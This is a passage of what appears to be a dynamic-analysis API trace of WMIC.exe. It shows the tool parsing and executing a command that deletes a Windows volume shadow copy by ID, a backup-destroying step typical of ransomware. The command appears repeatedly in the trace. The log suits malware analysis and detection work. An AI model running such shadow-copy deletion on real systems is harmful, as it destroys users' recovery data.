0x46c9e0 [0108.776] free (_Block=0x46c9e0) [0108.776] malloc (_Size=0x18) returned 0x46c9e0 [0108.776] malloc (_Size=0x18) returned 0x46ca00 [0108.776] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0108.776] SysStringLen (param_1="TABLE") returned 0x5 [0108.776] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0108.776] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.776] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0108.776] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.776] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0108.776] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.776] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.776] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0108.776] malloc (_Size=0x30) returned 0x468540 [0108.776] malloc (_Size=0x18) returned 0x46ca20 [0108.777] free (_Block=0x46ca20) [0108.777] malloc (_Size=0x18) returned 0x46ca20 [0108.777] malloc (_Size=0x18) returned 0x46ca40 [0108.777] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0108.777] SysStringLen (param_1="TABLE") returned 0x5 [0108.777] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0108.777] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.777] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0108.777] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.777] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0108.777] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.777] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0108.777] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0108.777] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.777] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0108.777] malloc (_Size=0x30) returned 0x468580 [0108.778] FreeThreadedDOMDocument:IUnknown:Release (This=0x21371d0) returned 0x0 [0108.778] free (_Block=0x466e90) [0108.778] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete" [0108.778] malloc (_Size=0xe0) returned 0x46cd30 [0108.778] memcpy_s (in: _Destination=0x46cd30, _DestinationSize=0xde, _Source=0x2225be, _SourceSize=0xd0 | out: _Destination=0x46cd30) returned 0x0 [0108.778] malloc (_Size=0x18) returned 0x46ca60 [0108.778] malloc (_Size=0x18) returned 0x46ca80 [0108.778] malloc (_Size=0x18) returned 0x46caa0 [0108.778] malloc (_Size=0x18) returned 0x46cac0 [0108.778] malloc (_Size=0x80) returned 0x466e90 [0108.778] GetLocalTime (in: lpSystemTime=0x10f890 | out: lpSystemTime=0x10f890*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0xd, wMilliseconds=0x125)) [0108.778] _vsnwprintf (in: _Buffer=0x466e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x10f7e8 | out: _Buffer="09-04-2020T08:55:13") returned 19 [0108.778] lstrlenW (lpString=" shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete") returned 71 [0108.778] malloc (_Size=0x90) returned 0x4670a0 [0108.778] lstrlenW (lpString=" shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete") returned 71 [0108.779] lstrlenW (lpString=" shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete") returned 71 [0108.779] malloc (_Size=0x90) returned 0x46ce20 [0108.779] lstrlenW (lpString=" shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete") returned 71 [0108.779] lstrlenW (lpString=" shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete") returned 71 [0108.779] lstrlenW (lpString=" shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete") returned 71 [0108.779] malloc (_Size=0x16) returned 0x46cae0 [0108.779] lstrlenW (lpString="shadowcopy") returned 10 [0108.779] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0108.779] malloc (_Size=0x16) returned 0x46cb00 [0108.779] malloc (_Size=0x8) returned 0x467140 [0108.779] free (_Block=0x0) [0108.780] free (_Block=0x46cae0) [0108.780] lstrlenW (lpString=" shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete") returned 71 [0108.780] malloc (_Size=0xc) returned 0x46cae0 [0108.780] lstrlenW (lpString="where") returned 5 [0108.780] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0108.780] malloc (_Size=0xc) returned 0x46cb20 [0108.780] malloc (_Size=0x10) returned 0x46cb40 [0108.780] memmove_s (in: _Destination=0x46cb40, _DestinationSize=0x8, _Source=0x467140, _SourceSize=0x8 | out: _Destination=0x46cb40) returned 0x0 [0108.780] free (_Block=0x467140) [0108.780] free (_Block=0x0) [0108.780] free (_Block=0x46cae0) [0108.780] lstrlenW (lpString=" shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete") returned 71 [0108.780] malloc (_Size=0x5c) returned 0x46cec0 [0108.780] lstrlenW (lpString="\"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\"") returned 45 [0108.780] _wcsicmp (_String1="\"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\"", _String2="\"NULL\"") returned -5 [0108.780] lstrlenW (lpString="\"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\"") returned 45 [0108.780] lstrlenW (lpString="\"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\"") returned 45 [0108.780] malloc (_Size=0x5c) returned 0x46cf30 [0108.780] malloc (_Size=0x18) returned 0x46cae0 [0108.780] memmove_s (in: _Destination=0x46cae0, _DestinationSize=0x10, _Source=0x46cb40, _SourceSize=0x10 | out: _Destination=0x46cae0) returned 0x0 [0108.780] free (_Block=0x46cb40) [0108.780] free (_Block=0x0) [0108.780] free (_Block=0x46cec0) [0108.780] lstrlenW (lpString=" shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete") returned 71 [0108.780] malloc (_Size=0xe) returned 0x46cb40 [0108.780] lstrlenW (lpString="delete") returned 6 [0108.780] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0108.780] malloc (_Size=0xe) returned 0x46cb60 [0108.780] malloc (_Size=0x20) returned 0x46cec0 [0108.781] memmove_s (in: _Destination=0x46cec0, _DestinationSize=0x18, _Source=0x46cae0, _SourceSize=0x18 | out: _Destination=0x46cec0) returned 0x0 [0108.781] free (_Block=0x46cae0) [0108.781] free (_Block=0x0) [0108.781] free (_Block=0x46cb40) [0108.781] malloc (_Size=0x20) returned 0x46cef0 [0108.781] lstrlenW (lpString="QUIT") returned 4 [0108.781] lstrlenW (lpString="shadowcopy") returned 10 [0108.781] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0108.781] lstrlenW (lpString="EXIT") returned 4 [0108.781] lstrlenW (lpString="shadowcopy") returned 10 [0108.781] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0108.781] free (_Block=0x46cef0) [0108.781] WbemLocator:IUnknown:AddRef (This=0x1d51390) returned 0x2 [0108.781] malloc (_Size=0x20) returned 0x46cef0 [0108.781] lstrlenW (lpString="/") returned 1 [0108.781] lstrlenW (lpString="shadowcopy") returned 10 [0108.781] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0108.781] lstrlenW (lpString="-") returned 1 [0108.781] lstrlenW (lpString="shadowcopy") returned 10 [0108.781] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0108.781] lstrlenW (lpString="CLASS") returned 5 [0108.781] lstrlenW (lpString="shadowcopy") returned 10 [0108.781] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0108.781] lstrlenW (lpString="PATH") returned 4 [0108.782] lstrlenW (lpString="shadowcopy") returned 10 [0108.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0108.782] lstrlenW (lpString="CONTEXT") returned 7 [0108.782] lstrlenW (lpString="shadowcopy") returned 10 [0108.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0108.782] lstrlenW (lpString="shadowcopy") returned 10 [0108.782] malloc (_Size=0x16) returned 0x46cb40 [0108.782] lstrlenW (lpString="shadowcopy") returned 10 [0108.782] GetCurrentThreadId () returned 0x8ac [0108.782] ??0CHString@@QEAA@XZ () returned 0x10f6a0 [0108.782] malloc (_Size=0x18) returned 0x46cae0 [0108.782] malloc (_Size=0x18) returned 0x46cb80 [0108.782] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d51390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffca2998 | out: ppNamespace=0xffca2998*=0x1d63a98) returned 0x0 [0108.802] free (_Block=0x46cb80) [0108.802] free (_Block=0x46cae0) [0108.802] CoSetProxyBlanket (pProxy=0x1d63a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0108.802] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0108.803] GetCurrentThreadId () returned 0x8ac [0108.803] ??0CHString@@QEAA@XZ () returned 0x10f538 [0108.803] malloc (_Size=0x18) returned 0x46cae0 [0108.803] malloc (_Size=0x18) returned 0x46cb80 [0108.803] malloc (_Size=0x18) returned 0x46cba0 [0108.803] malloc (_Size=0x18) returned 0x46cbc0 [0108.803] SysStringLen (param_1="root\\cli") returned 0x8 [0108.803] SysStringLen (param_1="\\") returned 0x1 [0108.803] malloc (_Size=0x18) returned 0x46cbe0 [0108.803] SysStringLen (param_1="root\\cli\\") returned 0x9 [0108.803] SysStringLen (param_1="ms_409") returned 0x6 [0108.803] free (_Block=0x46cbc0) [0108.803] free (_Block=0x46cba0) [0108.803] free (_Block=0x46cb80) [0108.803] free (_Block=0x46cae0) [0108.803] malloc (_Size=0x18) returned 0x46cae0 [0108.804] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d51390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffca29a0 | out: ppNamespace=0xffca29a0*=0x1d63b28) returned 0x0 [0108.809] free (_Block=0x46cae0) [0108.809] free (_Block=0x46cbe0) [0108.809] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0108.809] GetCurrentThreadId () returned 0x8ac [0108.809] ??0CHString@@QEAA@XZ () returned 0x10f6b0 [0108.809] malloc (_Size=0x18) returned 0x46cbe0 [0108.809] malloc (_Size=0x18) returned 0x46cae0 [0108.809] malloc (_Size=0x18) returned 0x46cb80 [0108.809] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0108.809] malloc (_Size=0x3a) returned 0x46cfa0 [0108.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc31980, cbMultiByte=-1, lpWideCharStr=0x46cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0108.809] free (_Block=0x46cfa0) [0108.809] malloc (_Size=0x18) returned 0x46cba0 [0108.809] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0108.809] SysStringLen (param_1="shadowcopy") returned 0xa [0108.809] malloc (_Size=0x18) returned 0x46cbc0 [0108.810] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0108.810] SysStringLen (param_1="'") returned 0x1 [0108.810] free (_Block=0x46cba0) [0108.810] free (_Block=0x46cb80) [0108.810] free (_Block=0x46cae0) [0108.810] free (_Block=0x46cbe0) [0108.810] IWbemServices:GetObject (in: This=0x1d63a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x10f6b8*=0x0, ppCallResult=0x0 | out: ppObject=0x10f6b8*=0x1d704e0, ppCallResult=0x0) returned 0x0 [0108.817] malloc (_Size=0x18) returned 0x46cbe0 [0108.817] IWbemClassObject:Get (in: This=0x1d704e0, wszName="Target", lFlags=0, pVal=0x10f5e0*(varType=0x0, wReserved1=0xffca, wReserved2=0x0, wReserved3=0x0, varVal1=0xffca2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f5e0*(varType=0x8, wReserved1=0xffca, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.817] free (_Block=0x46cbe0) [0108.817] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0108.817] malloc (_Size=0x3e) returned 0x46cfa0 [0108.817] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0108.817] malloc (_Size=0x18) returned 0x46cbe0 [0108.817] IWbemClassObject:Get (in: This=0x1d704e0, wszName="PWhere", lFlags=0, pVal=0x10f5e0*(varType=0x0, wReserved1=0xffca, wReserved2=0x0, wReserved3=0x0, varVal1=0x24e298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f5e0*(varType=0x8, wReserved1=0xffca, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.817] free (_Block=0x46cbe0) [0108.817] lstrlenW (lpString=" Where ID = '#'") returned 15 [0108.818] malloc (_Size=0x20) returned 0x46cff0 [0108.818] lstrlenW (lpString=" Where ID = '#'") returned 15 [0108.818] malloc (_Size=0x18) returned 0x46cbe0 [0108.818] IWbemClassObject:Get (in: This=0x1d704e0, wszName="Connection", lFlags=0, pVal=0x10f5e0*(varType=0x0, wReserved1=0xffca, wReserved2=0x0, wReserved3=0x0, varVal1=0x29bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f5e0*(varType=0xd, wReserved1=0xffca, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d709c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.818] free (_Block=0x46cbe0) [0108.818] IUnknown:QueryInterface (in: This=0x1d709c0, riid=0xffc37360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x10f5d0 | out: ppvObject=0x10f5d0*=0x1d709c0) returned 0x0 [0108.818] GetCurrentThreadId () returned 0x8ac [0108.818] ??0CHString@@QEAA@XZ () returned 0x10f4f8 [0108.818] malloc (_Size=0x18) returned 0x46cbe0 [0108.818] IWbemClassObject:Get (in: This=0x1d709c0, wszName="Namespace", lFlags=0, pVal=0x10f520*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffc4738f, varVal2=0x46cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x46cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.818] free (_Block=0x46cbe0) [0108.818] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0108.818] malloc (_Size=0x16) returned 0x46cbe0 [0108.818] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0108.818] malloc (_Size=0x18) returned 0x46cae0 [0108.819] IWbemClassObject:Get (in: This=0x1d709c0, wszName="Locale", lFlags=0, pVal=0x10f520*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ca658, varVal2=0x46cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x46cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.819] free (_Block=0x46cae0) [0108.819] lstrlenW (lpString="ms_409") returned 6 [0108.819] malloc (_Size=0xe) returned 0x46cae0 [0108.819] lstrlenW (lpString="ms_409") returned 6 [0108.819] malloc (_Size=0x18) returned 0x46cb80 [0108.819] IWbemClassObject:Get (in: This=0x1d709c0, wszName="User", lFlags=0, pVal=0x10f520*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ca658, varVal2=0x46cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f520*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ca658, varVal2=0x46cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.819] free (_Block=0x46cb80) [0108.819] malloc (_Size=0x18) returned 0x46cb80 [0108.819] IWbemClassObject:Get (in: This=0x1d709c0, wszName="Password", lFlags=0, pVal=0x10f520*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ca658, varVal2=0x46cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f520*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ca658, varVal2=0x46cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.819] free (_Block=0x46cb80) [0108.819] malloc (_Size=0x18) returned 0x46cb80 [0108.819] IWbemClassObject:Get (in: This=0x1d709c0, wszName="Server", lFlags=0, pVal=0x10f520*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ca658, varVal2=0x46cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x46cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.819] free (_Block=0x46cb80) [0108.819] lstrlenW (lpString=".") returned 1 [0108.819] malloc (_Size=0x4) returned 0x467140 [0108.819] lstrlenW (lpString=".") returned 1 [0108.819] malloc (_Size=0x18) returned 0x46cb80 [0108.820] IWbemClassObject:Get (in: This=0x1d709c0, wszName="Authority", lFlags=0, pVal=0x10f520*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ca658, varVal2=0x46cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f520*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ca658, varVal2=0x46cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.820] free (_Block=0x46cb80) [0108.820] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0108.820] IUnknown:Release (This=0x1d709c0) returned 0x1 [0108.820] GetCurrentThreadId () returned 0x8ac [0108.820] ??0CHString@@QEAA@XZ () returned 0x10f4f8 [0108.820] malloc (_Size=0x18) returned 0x46cb80 [0108.820] IWbemClassObject:Get (in: This=0x1d704e0, wszName="__RELPATH", lFlags=0, pVal=0x10f520*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ca658, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x10f520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0108.820] free (_Block=0x46cb80) [0108.820] malloc (_Size=0x18) returned 0x46cb80 [0108.820] GetCurrentThreadId () returned 0x8ac [0108.820] ??0CHString@@QEAA@XZ () returned 0x10f378 [0108.820] ??0CHString@@QEAA@PEBG@Z () returned 0x10f390 [0108.820] ??0CHString@@QEAA@AEBV0@@Z () returned 0x10f320 [0108.820] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0108.821] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x46d020 [0108.821] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0108.821] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x10f2e0 [0108.821] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x10f328 [0108.821] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x10f390 [0108.821] ??1CHString@@QEAA@XZ () returned 0x68530201 [0108.821] ??1CHString@@QEAA@XZ () returned 0x68530201 [0108.821] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x10f2e8 [0108.821] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x10f320 [0108.821] ??1CHString@@QEAA@XZ () returned 0x1 [0108.821] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x46d090 [0108.821] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0108.821] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x10f2e0 [0108.821] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x10f328 [0108.821] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x10f390 [0108.821] ??1CHString@@QEAA@XZ () returned 0x68530201 [0108.821] ??1CHString@@QEAA@XZ () returned 0x68530201 [0108.821] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x10f2e8 [0108.821] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x10f320 [0108.821] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0108.821] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0108.821] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0108.821] malloc (_Size=0x18) returned 0x46cba0 [0108.821] malloc (_Size=0x18) returned 0x46cc00 [0108.821] malloc (_Size=0x18) returned 0x46cc20 [0108.821] malloc (_Size=0x18) returned 0x46cc40 [0108.822] malloc (_Size=0x18) returned 0x46cc60 [0108.822] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0108.822] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0108.822] malloc (_Size=0x18) returned 0x46cc80 [0108.822] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0108.822] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0108.822] malloc (_Size=0x18) returned 0x46cca0 [0108.822] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0108.822] SysStringLen (param_1="\"") returned 0x1 [0108.822] free (_Block=0x46cc80) [0108.822] free (_Block=0x46cc60) [0108.822] free (_Block=0x46cc40) [0108.822] free (_Block=0x46cc20) [0108.822] free (_Block=0x46cc00) [0108.822] free (_Block=0x46cba0) [0108.823] IWbemServices:GetObject (in: This=0x1d63b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x10f368*=0x0, ppCallResult=0x0 | out: ppObject=0x10f368*=0x1d70a50, ppCallResult=0x0) returned 0x0 [0108.824] malloc (_Size=0x18) returned 0x46cba0 [0108.824] IWbemClassObject:Get (in: This=0x1d70a50, wszName="Text", lFlags=0, pVal=0x10f3a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffca2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x10f3a0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c4ab0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x24e030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0108.824] free (_Block=0x46cba0) [0108.824] SafeArrayGetLBound (in: psa=0x2c4ab0, nDim=0x1, plLbound=0x10f380 | out: plLbound=0x10f380) returned 0x0 [0108.824] SafeArrayGetUBound (in: psa=0x2c4ab0, nDim=0x1, plUbound=0x10f370 | out: plUbound=0x10f370) returned 0x0 [0108.824] SafeArrayGetElement (in: psa=0x2c4ab0, rgIndices=0x10f364, pv=0x10f3b8 | out: pv=0x10f3b8) returned 0x0 [0108.824] malloc (_Size=0x18) returned 0x46cba0 [0108.824] malloc (_Size=0x18) returned 0x46cc00 [0108.824] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0108.825] free (_Block=0x46cba0) [0108.825] IUnknown:Release (This=0x1d70a50) returned 0x0 [0108.825] free (_Block=0x46cca0) [0108.825] ??1CHString@@QEAA@XZ () returned 0x68530201 [0108.825] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0108.825] free (_Block=0x46cb80) [0108.825] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0108.825] lstrlenW (lpString="Shadow copy management.") returned 23 [0108.825] malloc (_Size=0x30) returned 0x4685c0 [0108.825] lstrlenW (lpString="Shadow copy management.") returned 23 [0108.825] free (_Block=0x46cc00) [0108.825] IUnknown:Release (This=0x1d704e0) returned 0x0 [0108.825] free (_Block=0x46cbc0) [0108.825] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0108.825] lstrlenW (lpString="PATH") returned 4 [0108.825] lstrlenW (lpString="where") returned 5 [0108.825] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0108.825] lstrlenW (lpString="WHERE") returned 5 [0108.825] lstrlenW (lpString="where") returned 5 [0108.826] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0108.826] lstrlenW (lpString="/") returned 1 [0108.826] lstrlenW (lpString="ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'") returned 43 [0108.826] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0108.826] lstrlenW (lpString="-") returned 1 [0108.826] lstrlenW (lpString="ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'") returned 43 [0108.826] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0108.826] lstrlenW (lpString="ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'") returned 43 [0108.826] malloc (_Size=0x58) returned 0x46d020 [0108.826] lstrlenW (lpString="ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'") returned 43 [0108.826] lstrlenW (lpString="/") returned 1 [0108.826] lstrlenW (lpString="delete") returned 6 [0108.826] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0108.826] lstrlenW (lpString="-") returned 1 [0108.826] lstrlenW (lpString="delete") returned 6 [0108.826] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0108.826] lstrlenW (lpString="delete") returned 6 [0108.826] malloc (_Size=0xe) returned 0x46cbc0 [0108.826] lstrlenW (lpString="delete") returned 6 [0108.826] lstrlenW (lpString="GET") returned 3 [0108.826] lstrlenW (lpString="delete") returned 6 [0108.826] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0108.826] lstrlenW (lpString="LIST") returned 4 [0108.826] lstrlenW (lpString="delete") returned 6 [0108.826] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0108.826] lstrlenW (lpString="SET") returned 3 [0108.826] lstrlenW (lpString="delete") returned 6 [0108.826] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0108.827] lstrlenW (lpString="CREATE") returned 6 [0108.827] lstrlenW (lpString="delete") returned 6 [0108.827] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0108.827] lstrlenW (lpString="CALL") returned 4 [0108.827] lstrlenW (lpString="delete") returned 6 [0108.827] CompareStringW 